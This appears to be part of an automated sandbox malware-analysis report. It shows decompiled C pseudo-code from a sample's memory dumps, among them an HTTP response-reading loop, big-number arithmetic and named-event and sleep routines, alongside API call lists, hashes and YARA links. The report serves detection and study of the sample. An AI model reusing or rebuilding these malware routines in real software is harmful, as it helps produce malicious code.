Part of subcall function 6E1D6B47: __decode_pointer.LIBCMT ref: 6E1D6B52

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 6f3d9d1881701bf8a52d60968634c7a9a83557c85b61e262406e1b402bd53dd6
Instruction ID: ecdeab048e3f5883267fb70ae4acfb45b5dcf2cec8725723e46331b7dbbb40db
Opcode Fuzzy Hash: 6f3d9d1881701bf8a52d60968634c7a9a83557c85b61e262406e1b402bd53dd6
Instruction Fuzzy Hash: 2741E732A00606DFDB05CFE9C85099EB7B6AF90374B35892AE465971C0E770DAC9EB40

Uniqueness

Uniqueness Score: -1.00%

Function 011853C6, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E011853C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E01181AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E011850FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E01185745(_t101,  &_v236, _a8, _t96 - _t81);
					E01185745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E011850FF(_t101, 0x118d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E011850FF(_a16, _a4);
						E01185088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0118AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0118AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E01185F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E011890C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E01186044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x118d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x011853c9
0x011853d5
0x011853db
0x011853e0
0x011853e4
0x01185541
0x01185545
0x01185545
0x011853ea
0x011853ee
0x011853f2
0x011853f5
0x01185400
0x01185406
0x0118540b
0x0118540e
0x01185428
0x01185434
0x0118543d
0x01185447
0x0118544c
0x0118544e
0x01185451
0x011854ff
0x01185505
0x01185516
0x01185529
0x01185539
0x00000000
0x0118553e
0x0118545a
0x01185461
0x01185465
0x0118546b
0x0118546d
0x0118546f
0x01185471
0x01185473
0x0118547d
0x01185482
0x01185484
0x01185486
0x01185487
0x01185488
0x01185489
0x01185490
0x01185497
0x0118549a
0x0118549a
0x01185467
0x01185467
0x01185467
0x011854a2
0x011854aa
0x011854b3
0x011854b8
0x011854b8
0x011854bd
0x00000000
0x00000000
0x011854bf
0x011854c2
0x011854cc
0x00000000
0x00000000
0x011854ce
0x011854ce
0x011854d8
0x011854b8
0x011854bd
0x00000000
0x00000000
0x00000000
0x011854bd
0x011854e2
0x011854e5
0x011854e8
0x011854ef
0x011854ef
0x011854fc
0x00000000
0x011854fc
0x011853f7
0x011853fb
0x011853fc
0x011853fe
0x00000000
0x00000000
0x00000000
0x011853fe
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 01185473
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01185489
memset.NTDLL ref: 01185529
memset.NTDLL ref: 01185539

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: dddcd36199ce761c0fa0eb39c616685c3dc6f4224e1ab5fbdc304fd34f72f1d1
Instruction ID: f1bd683717be5a73e578b5a6fe558275a24f4b728971e3302f82892687ea0d62
Opcode Fuzzy Hash: dddcd36199ce761c0fa0eb39c616685c3dc6f4224e1ab5fbdc304fd34f72f1d1
Instruction Fuzzy Hash: 1841B47160020AABDB58EFACCC80BDE7776EF54314F10C529F91AA7180EB709D558F90

Uniqueness

Uniqueness Score: -1.00%

Function 0118A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0118A82E

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

ResetEvent.KERNEL32(?), ref: 0118A8A2
GetLastError.KERNEL32 ref: 0118A8C5
GetLastError.KERNEL32 ref: 0118A970

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: f2f51533472396d724796b88fb8285bf39369ec589af7ae49a3abe355fc5c8c2
Instruction ID: 6f30b73824251c95ebaec023d97bc0bbd3114121cccc2547f7f6a415eff86e3c
Opcode Fuzzy Hash: f2f51533472396d724796b88fb8285bf39369ec589af7ae49a3abe355fc5c8c2
Instruction Fuzzy Hash: D1417F75500604BBDB39AFA5EC88E9F7FBEEF45704B10892AF65292090E7319545CF30

Uniqueness

Uniqueness Score: -1.00%

Function 011815FF, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E011815FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x118d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x118d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E0118A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x118d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E01185646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E0118A734(_v16);
										if(_t64 == 0) {
											_t64 = E011870CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E01185646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E01189242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x011815ff
0x01181600
0x01181606
0x01181611
0x01181611
0x01181613
0x011818e7
0x011818ec
0x011818ee
0x011818f3
0x011818f4
0x011818f9
0x011818fa
0x01181905
0x01181936
0x0118193b
0x011819fe
0x01181941
0x01181948
0x01181950
0x011819fb
0x01181956
0x0118195b
0x01181960
0x01181965
0x011819ed
0x0118196b
0x0118196b
0x0118196d
0x01181973
0x01181974
0x01181974
0x01181977
0x0118197a
0x01181980
0x01181985
0x01181986
0x0118198b
0x0118198e
0x01181999
0x00000000
0x00000000
0x011819a1
0x011819a9
0x011819b5
0x011819b9
0x011819bb
0x011819c0
0x00000000
0x00000000
0x011819c0
0x011819b9
0x011819d2
0x011819d5
0x011819dc
0x011819e7
0x011819e7
0x00000000
0x011819c2
0x011819c2
0x011819c7
0x011819c9
0x011819ca
0x011819cd
0x00000000
0x011819cd
0x00000000
0x011819c7
0x01181974
0x011819ee
0x011819ee
0x011819f4
0x011819f4
0x01181950
0x01181907
0x0118190d
0x01181915
0x0118192e
0x01181930
0x00000000
0x00000000
0x01181917
0x01181921
0x01181925
0x0118192b
0x00000000
0x0118192b
0x01181925
0x01181915
0x01181a07
0x01181608
0x01181608
0x0118160f
0x0118161a
0x00000000
0x00000000
0x00000000
0x0118160f

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 011818EE
GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 01181907
ResetEvent.KERNEL32(?), ref: 01181980
GetLastError.KERNEL32 ref: 0118199B

Part of subcall function 01189242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 01189259
Part of subcall function 01189242: SetEvent.KERNEL32(?), ref: 01189269

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 65e0acbbb0e728bbb14cf7a051153015565ce0b432f282938b2cce3af3b61605
Instruction ID: a3fb6038d857061d451fa0683e683032150380b766e832947ccbb89b10a160a7
Opcode Fuzzy Hash: 65e0acbbb0e728bbb14cf7a051153015565ce0b432f282938b2cce3af3b61605
Instruction Fuzzy Hash: CA410933A00604FFCB2ABBA9DC44FAEB7B9AF84354F118525E555D7190EB70E9428F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4B4A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1E4B7E
__isleadbyte_l.LIBCMT ref: 6E1E4BB2
MultiByteToWideChar.KERNEL32(00000080,00000009,6E1E0AAD,?,00000000,00000000,?,?,?,?,6E1E0AAD,00000000,?), ref: 6E1E4BE3
MultiByteToWideChar.KERNEL32(00000080,00000009,6E1E0AAD,00000001,00000000,00000000,?,?,?,?,6E1E0AAD,00000000,?), ref: 6E1E4C51

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 20f281de699cc1e56099dae52ea0e44c7c781e411286bc8a2a45e5a1179018a7
Instruction ID: a729f011394e998113ac2833a882146441807e304f31993f8993ebedd5c62965
Opcode Fuzzy Hash: 20f281de699cc1e56099dae52ea0e44c7c781e411286bc8a2a45e5a1179018a7
Instruction Fuzzy Hash: 3931DF30A00646EFDB10CFE4C894AAE3BB4BF01311B2586A8F164CB590D331D9C2EB50

Uniqueness

Uniqueness Score: -1.00%

Function 011811EE, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E011811EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x118d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x118d2a8; // 0x48aa5a8
				_t3 = _t8 + 0x118e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E011838A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x118d2ac, 1, 0, _t30);
					E0118A734(_t30);
				}
				_t12 =  *0x118d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0118A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E01188EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x118d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E0118A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x011811ef
0x011811f6
0x01181200
0x01181204
0x0118120a
0x01181219
0x01181220
0x01181224
0x01181236
0x01181238
0x01181238
0x0118123d
0x01181244
0x0118129b
0x0118129b
0x011812a1
0x011812a3
0x011812a3
0x011812ad
0x011812b1
0x011812c3
0x011812c3
0x011812c7
0x011812cd
0x011812cd
0x00000000
0x0118125d
0x01181262
0x0118126a
0x0118126e
0x01181272
0x01181272
0x0118127f
0x01181283
0x01181287
0x011812dc
0x011812e2
0x011812e2
0x01181295
0x01181299
0x011812d0
0x011812d2
0x011812d5
0x011812d5
0x00000000
0x011812d2
0x01181299
0x00000000
0x01181283

APIs

Part of subcall function 011838A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,05A39A98,00000000,?,?,63699BC3,00000005,0118D00C,?,?,01185D30), ref: 011838DE
Part of subcall function 011838A8: lstrcpy.KERNEL32(00000000,00000000), ref: 01183902
Part of subcall function 011838A8: lstrcat.KERNEL32(00000000,00000000), ref: 0118390A

CreateEventA.KERNEL32(0118D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,01183760,?,00000001,?), ref: 0118122F

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

WaitForSingleObject.KERNEL32(00000000,00004E20,01183760,00000000,00000000,?,00000000,?,01183760,?,00000001,?,?,?,?,011852AA), ref: 0118128F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,01183760,?,00000001,?), ref: 011812BD
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,01183760,?,00000001,?,?,?,?,011852AA), ref: 011812D5

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: a9350e7964231db9b7448e743d796da8b981e2835ebe78c6a7a21587a215813c
Instruction ID: b7c25fa7d86de0f37a0e78cd3e8ec479a7c0c42eba28bb35133072b6471d5c75
Opcode Fuzzy Hash: a9350e7964231db9b7448e743d796da8b981e2835ebe78c6a7a21587a215813c
Instruction Fuzzy Hash: 622105736003116FDB397AACAC44E6F77ABBB85764B65C625FA11D7144D720C8428F90

Uniqueness

Uniqueness Score: -1.00%

Function 01189242, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E01189242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x118d13c; // 0x118abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E0118A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0118A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E01185646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x01189242
0x01189242
0x0118924c
0x01189252
0x01189255
0x01189259
0x0118925f
0x01189264
0x0118927d
0x01189280
0x01189284
0x01189288
0x01189289
0x0118928e
0x01189291
0x01189298
0x0118929f
0x011892f2
0x011892f8
0x011892fe
0x01189339
0x0118933f
0x00000000
0x00000000
0x00000000
0x011892fe
0x011892a5
0x00000000
0x011892ac
0x011892ba
0x011892bd
0x011892c0
0x011892cc
0x011892d0
0x01189332
0x011892d2
0x011892d5
0x011892d9
0x011892da
0x011892db
0x011892dd
0x011892e4
0x01189322
0x0118932d
0x011892e6
0x011892e9
0x011892ed
0x011892ed
0x011892e4
0x00000000
0x011892d0
0x011892a5
0x01189269
0x0118926f
0x01189272
0x01189277
0x00000000
0x00000000
0x00000000
0x01189307
0x0118930f
0x01189314
0x01189317
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 01189259
SetEvent.KERNEL32(?), ref: 01189269
GetLastError.KERNEL32 ref: 011892F2

Part of subcall function 01185646: WaitForMultipleObjects.KERNEL32(00000002,0118A8E3,00000000,0118A8E3,?,?,?,0118A8E3,0000EA60), ref: 01185661

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

GetLastError.KERNEL32(00000000), ref: 01189327

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 8b824818e449b9387a44bee1357abd0e66929591fd339b48a518c46f1ba2aa6c
Instruction ID: 2a709d61b9b7001e0f92864944f06c1669f601996e6365efeea39476199e9773
Opcode Fuzzy Hash: 8b824818e449b9387a44bee1357abd0e66929591fd339b48a518c46f1ba2aa6c
Instruction Fuzzy Hash: BD3123B590070DEFDB25EFE5D8C49AEBBB8EF44348F10896AE642E2241D7309A459F50

Uniqueness

Uniqueness Score: -1.00%

Function 011836B1, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E011836B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E01183BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E01184F79(_t23);
						}
					}
					return _t38;
				}
				if(E0118A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x118d2ac, 1, 0,  *0x118d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0118A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0118853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E01184F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E011811EE( &_v32, _t39);
					goto L13;
				}
			}

0x011836b1
0x011836be
0x011836c4
0x011836c5
0x011836c6
0x011836c7
0x011836c8
0x011836cc
0x011836d8
0x011836dc
0x01183764
0x01183764
0x01183767
0x01183769
0x01183771
0x01183771
0x01183777
0x0118377a
0x0118377a
0x01183777
0x01183785
0x01183785
0x011836ef
0x011836f1
0x011836f1
0x01183708
0x0118370c
0x0118370f
0x0118371a
0x01183721
0x01183721
0x0118372a
0x0118372e
0x0118373c
0x01183730
0x01183730
0x01183731
0x01183732
0x01183733
0x01183734
0x01183735
0x01183735
0x01183741
0x01183744
0x01183748
0x0118374a
0x0118374a
0x01183751
0x00000000
0x01183753
0x01183753
0x01183760
0x00000000
0x01183760

APIs

CreateEventA.KERNEL32(0118D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,011852AA,?,00000001,?), ref: 01183702
SetEvent.KERNEL32(00000000,?,?,?,011852AA,?,00000001,?,00000002,?,?,01185D5E,?), ref: 0118370F
Sleep.KERNEL32(00000BB8,?,?,?,011852AA,?,00000001,?,00000002,?,?,01185D5E,?), ref: 0118371A
CloseHandle.KERNEL32(00000000,?,?,?,011852AA,?,00000001,?,00000002,?,?,01185D5E,?), ref: 01183721

Part of subcall function 0118A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,01183741,?,01183741,?,?,?,?,?,01183741,?), ref: 0118A520

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 38ce18e750bf6fcfe77f79fc03dc71efcfb0ac52d8cccc53b2b94bb7065a1a3b
Instruction ID: 35f6cc157ee1ab82524a1c8e76e19b46b80a8579f015de559174d664bfb3395d
Opcode Fuzzy Hash: 38ce18e750bf6fcfe77f79fc03dc71efcfb0ac52d8cccc53b2b94bb7065a1a3b
Instruction Fuzzy Hash: 9C210AB790021AABCF29BFEC88C49DEB769BF04654B09C425EA31E7100D730D9458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 01186545, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01186545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E0118A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x01186551
0x01186555
0x01186556
0x01186557
0x01186559
0x0118655b
0x0118655e
0x01186563
0x011865fa
0x01186601
0x01186601
0x0118656c
0x01186573
0x01186583
0x01186583
0x01186589
0x0118658b
0x01186590
0x01186599
0x0118659f
0x011865a4
0x011865af
0x011865b3
0x011865b5
0x011865b6
0x011865bf
0x011865c3
0x011865d4
0x011865c5
0x011865ca
0x011865cf
0x011865de
0x011865de
0x011865b3
0x011865e4
0x011865ea
0x011865ea
0x011865f3
0x011865f8
0x011865f8
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 01186573
lstrlenW.KERNEL32(?), ref: 011865A9
memcpy.NTDLL(00000000,?,?,?), ref: 011865CA
SysFreeString.OLEAUT32(?), ref: 011865DE

Memory Dump Source

